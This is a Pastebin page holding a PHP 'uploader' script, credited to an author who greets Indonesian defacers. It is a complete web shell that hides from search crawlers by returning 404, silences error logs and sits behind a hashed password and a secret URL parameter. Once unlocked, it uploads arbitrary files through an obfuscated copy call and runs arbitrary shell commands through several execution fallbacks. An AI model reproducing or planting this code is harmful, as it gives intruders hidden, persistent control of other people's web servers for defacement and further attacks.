API tools faq
paste
azisalvriyanto

uploader.php

azisalvriyanto
Aug 18th, 2017
44,633
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.43 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @ob_start();
  3. @session_start();
  4. @error_reporting(0);
  5. @set_time_limit(0);
  6. if(@version_compare(@PHP_VERSION, "5.3.0", "<")) {
  7.     @set_magic_quotes_runtime(0);
  8. }
  9. @clearstatcache();
  10. @ini_set("error_log",NULL);
  11. @ini_set("log_errors",0);
  12. @ini_set("max_execution_time",0);
  13. @ini_set("output_buffering",0);
  14. @ini_set("display_errors", 0);
  15.  
  16. $password = "1e7709da5a292b3021adf92e1406c36d";
  17.  
  18. if(!empty($_SERVER["HTTP_USER_AGENT"])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(@preg_match("/".@implode("|", $userAgents)."/i", $_SERVER["HTTP_USER_AGENT"])) {
  21.         @header("HTTP/1.0 404 Not Found");
  22.         exit;
  23.     }
  24. }
  25.  
  26. function command($input) {
  27.     $output = "";
  28.     if(@function_exists("exec")) {
  29.         @exec($input, $output);
  30.         $output = @join("\n", $output);
  31.     }
  32.     elseif (@function_exists("passthru")) {
  33.         @ob_start();
  34.         @passthru($input);
  35.         $output = @ob_get_clean();
  36.     }
  37.     elseif (@function_exists("system")) {
  38.         @ob_start();
  39.         @system($input);
  40.         $output = @ob_get_clean();
  41.     }
  42.     elseif (@function_exists("shell_exec")) {
  43.         $output = @shell_exec($input);
  44.     }
  45.     elseif (@is_resource($f=@popen($input, "r"))) {
  46.         $output = "";
  47.         while(!@feof($f)){
  48.             $output .= @fread($f,1024);
  49.         }
  50.         @pclose($f);
  51.     }
  52.  
  53.     return $output;
  54. }
  55.  
  56. function login() { ?>
  57.  
  58.                 <tr style="text-align: left;">
  59.                     <td><font color="#C1C1BF">PASSWORD</font></td>
  60.                     <td>:</td>
  61.                     <td><form method="post"><input type="password" name="password"></form></td>
  62.                 </tr>
  63.             </table>
  64.         </center>
  65.     </body>
  66.     </html><?php
  67.  
  68.     exit();
  69. }
  70.  
  71. if($_GET["al"] == "vri") { ?>
  72.     <!DOCTYPE html>
  73.     <html>
  74.     <head>
  75.  
  76. <!-- ================================================================
  77. [-] Uploader tool oleh AL-VRI | aalvriyanto@gmail.com;
  78. [-] Source: https://pastebin.com/raw/Ur85idS9;
  79. [-] Terima kasih kepada yang telah membantu dalam pembuatan tool ini;
  80. [-] Sampaikanlah walau hanya satu baris code;
  81. [-] Greetz: defacer Indonesia ; dan orang Indonesia;
  82. ================================================================= -->
  83.  
  84.         <title><?= "".(!empty($_SERVER["HTTPS"]) ? "https" : "http")."://".$_SERVER["HTTP_HOST"]."" ?> &mdash; AL-VRI (uploader)</title>
  85.         <link href="data:image/ico;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAAE4AAABNAAAATQAAAE0AAABNAAAATQAAAE0AAABNAAAATQAAAE0AAABNAAAATQAAAE0AAABPAAAAH/r/9On///////////////////////////////////////////////////////////////////////////n/8sv9//vn///////////////////////////////////////////////////////////////////////////8//jM/v/95v///////////////////////////////////////////////////////////////////////////f/6yv///+X//////////////////////////////////////////////////////////////////////////////cj//v7l///////////////////////////////////////////////////////////////////////////////I/v/45P/////////+/////v////7////+/////v////7////+/////v////7////+/////v////7//////v/4xwAA1eUTAND/GADP/xQAzv8NAMz/CwDM/wwAzP8MAMz/DADM/wwAzP8MAMz/DADM/woAzP8GAMz/AADP/wAA68g1HdvlOyXW/z0o1f8+KtX/PyvV/zwo1P84JNL/NCHR/zMg0f8zINH/MyDR/zMg0f8yH9H/MB3R/y8b1P81GvHINh7b5T4n1/9AKtb/QSzW/0Et1v9CLtb/Qi7W/0Iu1v9BLdb/PyvV/z4q1f8+KtX/PynV/z8p1f8/J9n/Oh/zyDce3OVBKdn/QizX/0Mt1/9ELtf/RC7X/0Qv1/9EL9f/RS/X/0Uv1/9FL9f/RC7X/0Mu1/9CK9b/QSja/zgf88g3HtzmQCXa/0Eo2P9CKtj/QirY/0Mr2P9DK9j/QyvY/0Mr2P9DK9j/QivY/0Iq2P9CKdj/QSfY/0El3P84H/PJNiTX4mJS3/9gUN3/YVHd/2FR3f9hUd3/YVHd/2FR3f9hUd3/YVHd/2FR3f9hUd3/YVHd/2BQ3f9gT+D/LxnywgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAA==" rel="icon" type="image/x-icon">
  86.         <style type="text/css">
  87.             html {
  88.                 background: #000000;
  89.                 color: #FFFFFF;
  90.                 font-family: "Courier New";
  91.                 font-size: 17px;
  92.             }
  93.  
  94.             a {
  95.                 color: #4169E1;
  96.                 text-decoration: none;
  97.             }
  98.  
  99.             textarea {
  100.                 background: #151515;
  101.                 color: #FFFFFF;
  102.                 font-family: "Courier New";
  103.                 height: 300px;
  104.                 width: 700px;
  105.                 border: none;
  106.                 padding: 10px;
  107.             }
  108.  
  109.             textarea:hover {
  110.                 box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
  111.             }
  112.  
  113.             textarea:focus {
  114.                 box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
  115.             }
  116.  
  117.             input {
  118.                 height: 100%;
  119.                 text-align: center;
  120.                 font-family: "Courier New";
  121.             }
  122.  
  123.             input[type=password] {
  124.                 width: 100%;
  125.                 color: red;
  126.                 background: transparent;
  127.                 border: 1px dotted #FFC0CB;
  128.             }
  129.  
  130.             input[type=text] {
  131.                 height: 20px;
  132.                 width: 350px;
  133.                 text-align: left;
  134.                 background: #3A3A3A;
  135.                 border: none;
  136.                 color: #FFFFFF;
  137.             }
  138.  
  139.             input[type=file] {
  140.                 width: 350px;
  141.                 color: #FFC0CB;
  142.                 padding-right: 4px;
  143.             }
  144.  
  145.             input[type=submit] {
  146.                 width: 100px;
  147.             }
  148.  
  149.             table {
  150.                 text-align: center;
  151.             }
  152.  
  153.             td {
  154.                 padding: 3px;
  155.             }
  156.         </style>
  157.     </head>
  158.     <body>
  159.         <br><br><br>
  160.  
  161.         <center>
  162.             <table>
  163.                 <tr style="text-align: left;">
  164.                     <td style="width: 115px;"><font color="#C1C1BF">SYSTEM</font></td>
  165.                     <td>:</td>
  166.                     <td><font color="#A6E22E"><?= @php_uname(); ?></font></td>
  167.                 </tr>
  168.                 <tr style="text-align: left;">
  169.                     <td><font color="#C1C1BF">DIRECTORY</font></td>
  170.                     <td>:</td>
  171.                     <td><font color="#A6E22E"><?= "".$_SERVER["DOCUMENT_ROOT"].$_SERVER["PHP_SELF"]."" ?></font></td>
  172.                 </tr><?php
  173.  
  174.         if(empty($password) || !empty($_POST["password"]) && @md5($_POST["password"]) == $password) {
  175.             $_SESSION["login"] = $_SERVER["REMOTE_ADDR"]."-".$_POST["password"];
  176.         }
  177.         if(!$_SESSION["login"]) {
  178.             login();
  179.         } echo "
  180.                 <tr>
  181.                     <td>";
  182.                         if($_POST["upload"]) {
  183.                             $copy = @base64_decode("Y29weQ==");
  184.                             if(@$copy($_FILES["filetoupload"]["tmp_name"], $_FILES["filetoupload"]["name"])) {
  185.                                 echo "<font color=\"#87CEFA\">[</font> <font color=\"#4169E1\"><a href=\"".$_FILES["filetoupload"]["name"]."\" target=\"_blank\">SUCCESS</a></font> <font color=\"#87CEFA\">]</font>";
  186.                             }
  187.                             else {
  188.                                 echo "<font color=\"#87CEFA\">[</font> <font color=\"#FF0000\">FAILED</font> <font color=\"#87CEFA\">]</font>";
  189.                             }
  190.                         }
  191.                         else {
  192.                             echo "<font color=\"#87CEFA\">[</font> <font color=\"#7F8C8D\">-</font> <font color=\"#87CEFA\">]</font>";
  193.                         } ?>
  194.                     </td>
  195.                     <td></td>
  196.                     <td><form method="POST" enctype="multipart/form-data"><input type="file" name="filetoupload"><input type="submit" value="upload" name="upload"></form></td>
  197.                 </tr>
  198.                 <tr>
  199.                     <td><font color="#87CEFA">[</font> <a style="color: #FF005F;" href="?al=vri&log=out">LOGOUT</a> <font color="#87CEFA">]</font></td>
  200.                     <td></td>
  201.                     <td><form method="POST"><input type="text" name="command"><input type="submit" value="command"></form></td>
  202.                 </tr><?php
  203.  
  204.                 if(!empty($_POST["command"])) { ?>
  205.                     <tr style="text-align: left;">
  206.                         <td></td>
  207.                         <td></td>
  208.                         <td>
  209.                             <center>
  210.                                 <textarea type="text" wrap="off"><?= command($_POST["command"]); ?></textarea>
  211.                             </center>
  212.                         </td>
  213.                     </tr><?php
  214.                 } ?>
  215.  
  216.             </table>
  217.         </center><?php
  218.  
  219.         if($_GET["log"] == "out") {
  220.             unset($_SESSION["login"]);
  221.             @session_destroy();
  222.  
  223.             @header("Location: ".basename($_SERVER["PHP_SELF"])."?al=vri");
  224.  
  225.             exit;
  226.         } ?>
  227.  
  228.  
  229.         <br><br>
  230.     </body>
  231.     </html><?php
  232. } ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!